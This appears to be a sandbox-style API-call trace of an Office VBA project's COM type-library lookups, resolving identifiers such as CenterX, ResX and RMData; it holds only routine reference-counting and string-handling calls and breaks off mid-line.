ITypeInfo:GetRefTypeInfo (in: This=0xb5a5078, hreftype=0xfffffffe, ppTInfo=0x2e4828 | out: ppTInfo=0x2e4828*=0xb5a5018) returned 0x0 [0033.020] IUnknown:Release (This=0xb5a5078) returned 0x4 [0033.020] ITypeInfo:GetRefTypeInfo (in: This=0xb5a5018, hreftype=0x49, ppTInfo=0x2e3fb8 | out: ppTInfo=0x2e3fb8*=0xb5b2308) returned 0x0 [0033.020] IUnknown:QueryInterface (in: This=0xb5b2308, riid=0x7fee3a7ade8*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e4188 | out: ppvObject=0x2e4188*=0x0) returned 0x80004002 [0033.020] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b2308, ppTypeAttr=0x2e4008, pDummy=0x10 | out: ppTypeAttr=0x2e4008, pDummy=0x10) returned 0x0 [0033.020] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b2308) returned 0x0 [0033.020] IUnknown:Release (This=0xb5b2308) returned 0x2 [0033.020] IUnknown:AddRef (This=0xb5b2308) returned 0x3 [0033.020] IUnknown:AddRef (This=0xb5b2308) returned 0x3 [0033.020] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e4c28, pDummy=0x0 | out: ppTypeAttr=0x2e4c28, pDummy=0x0) returned 0x0 [0033.020] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.020] IUnknown:Release (This=0xb5a5018) returned 0x5 [0033.020] IMalloc:Free (This=0x7fefe015380, pv=0x7846630) [0033.020] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5a5018, ppTypeAttr=0x2e41c0, pDummy=0x0 | out: ppTypeAttr=0x2e41c0, pDummy=0x0) returned 0x0 [0033.020] ITypeInfo:LocalReleaseTypeAttr (This=0xb5a5018) returned 0x0 [0033.020] IUnknown:Release (This=0xb5b2308) returned 0x2 [0033.020] IUnknown:AddRef (This=0xb5b23b8) returned 0x4 [0033.020] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b23b8, ppTypeAttr=0x2e4c28, pDummy=0x9e4227e | out: ppTypeAttr=0x2e4c28, pDummy=0x9e4227e*=0x0) returned 0x0 [0033.020] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b23b8) returned 0x0 [0033.020] IUnknown:Release (This=0xb5b23b8) returned 0x3 [0033.020] IMalloc:Free (This=0x7fefe015380, pv=0x7846630) [0033.021] ITypeInfo:RemoteGetTypeAttr (in: This=0xb5b23b8, ppTypeAttr=0x2e41c0, pDummy=0x0 | out: ppTypeAttr=0x2e41c0, pDummy=0x0) returned 0x0 [0033.021] ITypeInfo:LocalReleaseTypeAttr (This=0xb5b23b8) returned 0x0 [0033.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x763f01c, cbMultiByte=0, lpWideCharStr=0x9e43aca, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0033.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x763f01c, cbMultiByte=0, lpWideCharStr=0x9d104dc, cchWideChar=2 | out: lpWideCharStr="") returned 0 [0033.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6a607ea, cbMultiByte=13, lpWideCharStr=0x2e46c0, cchWideChar=12 | out: lpWideCharStr="Environment") returned 0 [0033.021] IMalloc:Alloc (This=0x7fefe015380, cb=0x230) returned 0xb5c7e10 [0033.021] wcscpy_s (in: _Destination=0xb5c7e38, _SizeInWords=0xc, _Source="Environment" | out: _Destination="Environment") returned 0x0 [0033.021] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CenterX") returned 0x108aa1 [0033.021] strcpy_s (in: _Dst=0x2e4800, _DstSize=0x8, _Src="CenterX" | out: _Dst="CenterX") returned 0x0 [0033.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4800, cbMultiByte=8, lpWideCharStr=0x2e4650, cchWideChar=8 | out: lpWideCharStr="CenterX") returned 8 [0033.021] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.021] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="CenterX", lHashVal=0x108aa1, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.021] IUnknown:Release (This=0x782a220) returned 0xe [0033.022] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.022] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="CenterX", lHashVal=0x108aa1, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.022] IUnknown:Release (This=0x731da90) returned 0x15 [0033.022] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.022] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="CenterX", lHashVal=0x108aa1, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.022] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.022] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.022] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="CenterX", lHashVal=0x108aa1, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.022] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.022] IMalloc:Alloc (This=0x7fefe015380, cb=0xf) returned 0xb495a70 [0033.022] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_CenterX") returned 0x108e25 [0033.022] strcpy_s (in: _Dst=0x2e49b0, _DstSize=0xf, _Src="_B_var_CenterX" | out: _Dst="_B_var_CenterX") returned 0x0 [0033.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e49b0, cbMultiByte=15, lpWideCharStr=0x2e4800, cchWideChar=15 | out: lpWideCharStr="_B_var_CenterX") returned 15 [0033.022] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.022] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_CenterX", lHashVal=0x108e25, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.022] IUnknown:Release (This=0x782a220) returned 0xe [0033.022] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.022] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_CenterX", lHashVal=0x108e25, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.022] IUnknown:Release (This=0x731da90) returned 0x15 [0033.022] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.022] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_CenterX", lHashVal=0x108e25, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.022] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.022] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.022] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_CenterX", lHashVal=0x108e25, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.022] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.022] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.022] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_CenterX", lHashVal=0x108e25, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.022] IUnknown:Release (This=0x782b300) returned 0x6 [0033.022] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.022] IUnknown:Release (This=0x782a220) returned 0xe [0033.022] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CenterY") returned 0x108a9e [0033.022] strcpy_s (in: _Dst=0x2e4800, _DstSize=0x8, _Src="CenterY" | out: _Dst="CenterY") returned 0x0 [0033.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4800, cbMultiByte=8, lpWideCharStr=0x2e4650, cchWideChar=8 | out: lpWideCharStr="CenterY") returned 8 [0033.022] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.022] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="CenterY", lHashVal=0x108a9e, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.022] IUnknown:Release (This=0x782a220) returned 0xe [0033.022] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.022] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="CenterY", lHashVal=0x108a9e, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.022] IUnknown:Release (This=0x731da90) returned 0x15 [0033.022] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.022] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="CenterY", lHashVal=0x108a9e, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.022] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.022] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.022] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="CenterY", lHashVal=0x108a9e, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.023] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.023] IMalloc:Alloc (This=0x7fefe015380, cb=0xf) returned 0xb495a70 [0033.023] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_CenterY") returned 0x108e22 [0033.023] strcpy_s (in: _Dst=0x2e49b0, _DstSize=0xf, _Src="_B_var_CenterY" | out: _Dst="_B_var_CenterY") returned 0x0 [0033.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e49b0, cbMultiByte=15, lpWideCharStr=0x2e4800, cchWideChar=15 | out: lpWideCharStr="_B_var_CenterY") returned 15 [0033.023] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.023] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_CenterY", lHashVal=0x108e22, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.023] IUnknown:Release (This=0x782a220) returned 0xe [0033.023] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.023] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_CenterY", lHashVal=0x108e22, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.023] IUnknown:Release (This=0x731da90) returned 0x15 [0033.023] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.023] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_CenterY", lHashVal=0x108e22, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.023] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.023] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.023] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_CenterY", lHashVal=0x108e22, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.023] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.023] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.023] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_CenterY", lHashVal=0x108e22, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.023] IUnknown:Release (This=0x782b300) returned 0x6 [0033.023] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.023] IUnknown:Release (This=0x782a220) returned 0xe [0033.023] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ResX") returned 0x101fbd [0033.023] strcpy_s (in: _Dst=0x2e4800, _DstSize=0x5, _Src="ResX" | out: _Dst="ResX") returned 0x0 [0033.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4800, cbMultiByte=5, lpWideCharStr=0x2e4650, cchWideChar=5 | out: lpWideCharStr="ResX") returned 5 [0033.023] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.023] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="ResX", lHashVal=0x101fbd, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.023] IUnknown:Release (This=0x782a220) returned 0xe [0033.023] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.023] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="ResX", lHashVal=0x101fbd, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.023] IUnknown:Release (This=0x731da90) returned 0x15 [0033.023] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.023] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="ResX", lHashVal=0x101fbd, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.023] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.023] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.023] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="ResX", lHashVal=0x101fbd, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.023] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.023] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0xb495a70 [0033.023] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ResX") returned 0x108529 [0033.023] strcpy_s (in: _Dst=0x2e49b0, _DstSize=0xc, _Src="_B_var_ResX" | out: _Dst="_B_var_ResX") returned 0x0 [0033.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e49b0, cbMultiByte=12, lpWideCharStr=0x2e4800, cchWideChar=12 | out: lpWideCharStr="_B_var_ResX") returned 12 [0033.023] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.024] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_ResX", lHashVal=0x108529, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.024] IUnknown:Release (This=0x782a220) returned 0xe [0033.024] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.024] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_ResX", lHashVal=0x108529, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.024] IUnknown:Release (This=0x731da90) returned 0x15 [0033.024] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.024] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_ResX", lHashVal=0x108529, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.024] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.024] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.024] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_ResX", lHashVal=0x108529, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.024] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.024] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.024] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_ResX", lHashVal=0x108529, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.024] IUnknown:Release (This=0x782b300) returned 0x6 [0033.024] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.024] IUnknown:Release (This=0x782a220) returned 0xe [0033.024] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RMData") returned 0x1002c4 [0033.024] strcpy_s (in: _Dst=0x2e4800, _DstSize=0x7, _Src="RMData" | out: _Dst="RMData") returned 0x0 [0033.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4800, cbMultiByte=7, lpWideCharStr=0x2e4650, cchWideChar=7 | out: lpWideCharStr="RMData") returned 7 [0033.024] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.024] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="RMData", lHashVal=0x1002c4, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.024] IUnknown:Release (This=0x782a220) returned 0xe [0033.024] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.024] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="RMData", lHashVal=0x1002c4, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.024] IUnknown:Release (This=0x731da90) returned 0x15 [0033.024] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.024] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="RMData", lHashVal=0x1002c4, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.024] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.024] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.024] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="RMData", lHashVal=0x1002c4, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.024] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.024] IMalloc:Alloc (This=0x7fefe015380, cb=0xe) returned 0xb495a70 [0033.024] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_RMData") returned 0x107d6d [0033.024] strcpy_s (in: _Dst=0x2e49b0, _DstSize=0xe, _Src="_B_var_RMData" | out: _Dst="_B_var_RMData") returned 0x0 [0033.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e49b0, cbMultiByte=14, lpWideCharStr=0x2e4800, cchWideChar=14 | out: lpWideCharStr="_B_var_RMData") returned 14 [0033.024] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.024] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_RMData", lHashVal=0x107d6d, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.024] IUnknown:Release (This=0x782a220) returned 0xe [0033.024] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.024] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_RMData", lHashVal=0x107d6d, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.024] IUnknown:Release (This=0x731da90) returned 0x15 [0033.024] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.024] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_RMData", lHashVal=0x107d6d, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.024] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.025] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.025] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_RMData", lHashVal=0x107d6d, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.025] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.025] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.025] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_RMData", lHashVal=0x107d6d, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.025] IUnknown:Release (This=0x782b300) returned 0x6 [0033.025] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.025] IUnknown:Release (This=0x782a220) returned 0xe [0033.025] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="RMCount") returned 0x10189a [0033.025] strcpy_s (in: _Dst=0x2e4800, _DstSize=0x8, _Src="RMCount" | out: _Dst="RMCount") returned 0x0 [0033.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4800, cbMultiByte=8, lpWideCharStr=0x2e4650, cchWideChar=8 | out: lpWideCharStr="RMCount") returned 8 [0033.025] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.025] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="RMCount", lHashVal=0x10189a, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.025] IUnknown:Release (This=0x782a220) returned 0xe [0033.025] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.025] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="RMCount", lHashVal=0x10189a, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.025] IUnknown:Release (This=0x731da90) returned 0x15 [0033.025] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.025] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="RMCount", lHashVal=0x10189a, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.025] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.025] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.025] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="RMCount", lHashVal=0x10189a, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.025] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.025] IMalloc:Alloc (This=0x7fefe015380, cb=0xf) returned 0xb495a70 [0033.025] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_RMCount") returned 0x101c1e [0033.025] strcpy_s (in: _Dst=0x2e49b0, _DstSize=0xf, _Src="_B_var_RMCount" | out: _Dst="_B_var_RMCount") returned 0x0 [0033.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e49b0, cbMultiByte=15, lpWideCharStr=0x2e4800, cchWideChar=15 | out: lpWideCharStr="_B_var_RMCount") returned 15 [0033.026] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.026] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_RMCount", lHashVal=0x101c1e, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.026] IUnknown:Release (This=0x782a220) returned 0xe [0033.026] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.026] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_RMCount", lHashVal=0x101c1e, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.026] IUnknown:Release (This=0x731da90) returned 0x15 [0033.026] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.026] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="_B_var_RMCount", lHashVal=0x101c1e, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.026] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.026] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.026] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="_B_var_RMCount", lHashVal=0x101c1e, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.026] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.026] IUnknown:AddRef (This=0x782b300) returned 0x7 [0033.026] ITypeLib:RemoteIsName (in: This=0x782b300, szNameBuf="_B_var_RMCount", lHashVal=0x101c1e, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.026] IUnknown:Release (This=0x782b300) returned 0x6 [0033.026] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.026] IUnknown:Release (This=0x782a220) returned 0xe [0033.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb52fb9c, cbMultiByte=11, lpWideCharStr=0x9d131b2, cchWideChar=24 | out: lpWideCharStr="selectfalse") returned 11 [0033.026] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Optio") returned 0x100c9a [0033.026] strcpy_s (in: _Dst=0x2e4800, _DstSize=0x6, _Src="Optio" | out: _Dst="Optio") returned 0x0 [0033.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4800, cbMultiByte=6, lpWideCharStr=0x2e4650, cchWideChar=6 | out: lpWideCharStr="Optio") returned 6 [0033.026] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.026] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="Optio", lHashVal=0x100c9a, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.026] IUnknown:Release (This=0x782a220) returned 0xe [0033.026] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.026] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="Optio", lHashVal=0x100c9a, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.026] IUnknown:Release (This=0x731da90) returned 0x15 [0033.026] IUnknown:AddRef (This=0x731cc80) returned 0x13 [0033.026] ITypeLib:RemoteIsName (in: This=0x731cc80, szNameBuf="Optio", lHashVal=0x100c9a, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.026] IUnknown:Release (This=0x731cc80) returned 0x12 [0033.026] IUnknown:AddRef (This=0x7829f50) returned 0x8 [0033.026] ITypeLib:RemoteIsName (in: This=0x7829f50, szNameBuf="Optio", lHashVal=0x100c9a, pfName=0x2e4720, pBstrLibName=0x2e4650 | out: pfName=0x2e4720*=0, pBstrLibName=0x2e4650) returned 0x0 [0033.026] IUnknown:Release (This=0x7829f50) returned 0x7 [0033.026] IMalloc:Alloc (This=0x7fefe015380, cb=0xd) returned 0xb495a70 [0033.026] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Optio") returned 0x10d0c6 [0033.026] strcpy_s (in: _Dst=0x2e49b0, _DstSize=0xd, _Src="_B_var_Optio" | out: _Dst="_B_var_Optio") returned 0x0 [0033.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e49b0, cbMultiByte=13, lpWideCharStr=0x2e4800, cchWideChar=13 | out: lpWideCharStr="_B_var_Optio") returned 13 [0033.026] IUnknown:AddRef (This=0x782a220) returned 0xf [0033.026] ITypeLib:RemoteIsName (in: This=0x782a220, szNameBuf="_B_var_Optio", lHashVal=0x10d0c6, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.026] IUnknown:Release (This=0x782a220) returned 0xe [0033.026] IUnknown:AddRef (This=0x731da90) returned 0x16 [0033.026] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="_B_var_Optio", lHashVal=0x10d0c6, pfName=0x2e48d0, pBstrLibName=0x2e4800 | out: pfName=0x2e48d0*=0, pBstrLibName=0x2e4800) returned 0x0 [0033.026] IUnknown:Release (This=0x731da90) returned 0x15 [0033.027] IUnknown:AddRef (This=0x731cc80) returned 